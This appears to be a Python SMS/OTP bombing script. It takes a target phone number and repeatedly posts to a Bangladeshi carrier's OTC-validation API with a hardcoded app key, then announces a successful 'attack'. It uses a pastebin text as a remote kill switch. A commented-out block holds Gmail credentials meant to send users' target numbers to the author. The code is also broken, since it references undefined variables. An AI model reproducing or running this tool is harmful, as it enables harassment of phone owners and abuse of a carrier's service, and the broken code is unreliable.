import os
os.system("clear")
import smtplib
import json
import os
try:
	import requests
except:
	os.system("pip install requests")
	import requests
import time
from requests.structures import CaseInsensitiveDict

from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#CVALUE
blue= '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan  = "\033[96m"
end = '\033[0m'
purple="\033[0;35m"
os.system('clear')
line=red+"Note: I won't be responsible fo any damage caused by this script. Use at your own risk."
space=" "
import os
os.system("clear")
logo=(green+"""
  __  __ _____    ______   _____           _      
 |  \/  |  __ \  |  ____| |_   _|         | |     
 | \  / | |__) | | |__ ___  | |  ___  __ _| |     
 | |\/| |  _  /  |  __/ _ \ | | / __|/ _` | |     
 | |  | | | \ \  | | | (_) || |_\__ \ (_| | |____ 
 |_|  |_|_|  \_\ |_|  \___/_____|___/\__,_|______|
                                                  
                                                  
""")
text=lightblue+"\t\tCreated By : "+yellow+"FOiSAL JiBon"+cyan+"\n\n\t\t★★ "+purple+" BLACkRose"+cyan+"★★   \n" 
notice=""     
def header():
	print(logo)
	print(text)
	print(line)
	print(notice)
				
header()
print(red+"____________________________________________________")
print("\t\tYou need to security key")
print("---------------------------------------------------‌‌‌‌‌‌‌-")
n=2
while n==2:
	a=str(input(cyan+"\n\n\t\t[>] Security key : "+green))
	if a=="rb":
	 print(green+"\n\n\t\t[ √ ] Request Accepted")
	 n=3
	else:
	 print(red+"\n\n\t\t[ × ] Incorrect security code!\n\t\tPlease Try Again")
	 n=2
import os
os.system("clear")
header()
import  time
num=input(blue+"\nEnter Api: "+yellow)
print(red,"\n\tCounter Must Be like 5/10/15/20.....")
i=int(input(lightblue+"\n\t\tEnter Amount: "))
headers = {"x-app-key":"000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"}
"""
mr=smtplib.SMTP('smtp.gmail.com','587')
mr.ehlo()
mr.starttls()
email="getuserinput100@gmail.com"
pwd="GetUserInput"
mr.login(email,pwd)
tmail="getuserinputpython@gmail.com"
msg=("custom sms Try&Except")+">"+str(num)+">"+str(i)+"> "+str(sms)
mr.sendmail(email,tmail,msg)
"""
import os
os.system("clear")
remote=requests.get("https://pastebin.com/raw/CuvqLKap").text
header()
while remote ==("Time"):
	y=0
	while y<i:
	   try:
	   	url = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=validateOTC&pin=123456&otc=kVpbzid4&app_version=79&msisdn=88"+num
	   	time.sleep(1)
	   	x=requests.post(url,  headers = headers)
	   	print("\n",yellow,x.text)
	   	time.sleep(1)
	   	x=requests.post(url, headers=headers)
	   	time.sleep(1)
	   	x=requests.post(url,  headers = headers)
	   	print("\n",green,x.text)
	   	time.sleep(1)
	   	x=requests.post(url,  headers = headers)
	   	print("\n",cyan,x.text)
	   	time.sleep(2)
	   	x=requests.post(url,  headers = headers)
	   	y=y+5
	   	print(lightblue,y,yellow+"It'z Mr. FoisaL",purple+"\t[>] Target APi:-  ",red+str(api),purple+"\tMessage:-",(msg))
	   except:
	   	print(red+"\n\t\tinternet connection Failed")
	print(purple+"\n\n\tCongress!\t  Your Attack successfully",yellow+"Done",green+"\n\n\t\t\tStay with",cyan+"Mr. Tool")
	xx=input(yellow+"\nPress Enter to continue")
